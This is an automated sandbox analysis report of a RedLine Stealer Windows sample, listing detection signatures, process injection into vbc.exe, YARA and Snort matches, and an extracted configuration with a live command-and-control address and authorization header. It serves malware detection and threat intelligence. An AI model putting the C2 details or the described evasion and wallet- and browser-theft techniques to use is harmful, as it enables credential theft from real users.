Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
Analysis ID: 756115
MD5: 34a852c0f62294480e1e6e154b00539a
SHA1: 6204b0e10eaf8094da16cb5ca7c325f1dbfa97f0
SHA256: f461d11f2fac14f49aeedd66999b404cfce4138d27fe7e1da79f0aa85eee5149
Tags: exe, RedLineStealer

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains functionality to inject code into remote processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe (PID: 3384 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe MD5: 34A852C0F62294480E1E6E154B00539A)
    • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vbc.exe (PID: 260 cmdline: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
    • conhost.exe (PID: 576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 url": ["193.106.191.138:32796"], "Authorization Header": "54c79ce081122137049ee07c0a2f38ab"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.318847444.00000000005E2000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
  • 0x21068:$pat14: , CommandLine:
  • 0x18d64:$v2_1: ListOfProcesses
  • 0x18af8:$v4_3: base64str
  • 0x19b83:$v4_4: stringKey
  • 0x16708:$v4_5: BytesToStringConverted
  • 0x15770:$v4_6: FromBase64
  • 0x16edc:$v4_8: procName
  • 0x1725f:$v5_1: DownloadAndExecuteUpdate
  • 0x18a08:$v5_2: ITaskProcessor
  • 0x1724d:$v5_3: CommandLineUpdate
  • 0x1723e:$v5_4: DownloadUpdate
  • 0x178f2:$v5_5: FileScanning
  • 0x16a77:$v5_7: RecordHeaderField
  • 0x16496:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.414788.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.414788.1.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
  • 0x1f468:$pat14: , CommandLine:
  • 0x17164:$v2_1: ListOfProcesses
  • 0x16ef8:$v4_3: base64str
  • 0x17f83:$v4_4: stringKey
  • 0x14b08:$v4_5: BytesToStringConverted
  • 0x13b70:$v4_6: FromBase64
  • 0x152dc:$v4_8: procName
  • 0x1565f:$v5_1: DownloadAndExecuteUpdate
  • 0x16e08:$v5_2: ITaskProcessor
  • 0x1564d:$v5_3: CommandLineUpdate
  • 0x1563e:$v5_4: DownloadUpdate
  • 0x15cf2:$v5_5: FileScanning
  • 0x14e77:$v5_7: RecordHeaderField
  • 0x14896:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

No Sigma rule has matched

Timestamp: 11/29/22-16:50:39.536972
Source IP: 192.168.2.5
Destination IP: 193.106.191.138
SID: 2850027
Source Port: 49699
Destination Port: 32796
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/29/22-16:51:03.828285
Source IP: 192.168.2.5
Destination IP: 193.106.191.138
SID: 2850286
Source Port: 49699
Destination Port: 32796
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/29/22-16:50:41.373927
Source IP: 193.106.191.138
Destination IP: 192.168.2.5
SID: 2850353
Source Port: 32796
Destination Port: 49699
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe | Virustotal: Detection: 30%
Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe | Joe Sandbox ML: detected
Source: 0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["193.106.191.138:32796"], "Authorization Header": "54c79ce081122137049ee07c0a2f38ab"}
Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 4x nop then jmp 09F9F6D0h | 2_2_09F9F6B8

Networking

Source: Traffic | Snort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.5:49699 -> 193.106.191.138:32796
Source: Traffic | Snort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.5:49699 -> 193.106.191.138:32796
Source: Traffic | Snort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 193.106.191.138:32796 -> 192.168.2.5:49699
Source: global traffic | TCP traffic: 193.106.191.138 ports 2,3,32796,6,7,9
Source: Malware configuration extractor | URLs: 193.106.191.138:32796
Source: Joe Sandbox View | ASN Name: BOSPOR-ASRU
Source: Joe Sandbox View | IP Address: 193.106.191.138
Source: global traffic | TCP traffic: 192.168.2.5:49699 -> 193.106.191.138:32796
Source: unknown | TCP traffic detected without corresponding DNS query: 193.106.191.138
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.422006641.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.422006641.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe, SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe, 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: vbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: vbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: vbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                      Source: vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                      Source: vbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                      Source: vbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      System Summary

                      Source: 0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.414788.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.414788.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe, 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameThirdsmen.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe, 00000000.00000000.315352225.0000000000439000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameCarapace ruff0 vs SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Binary or memory string: OriginalFilenameCarapace ruff0 vs SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Virustotal: Detection: 30%
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
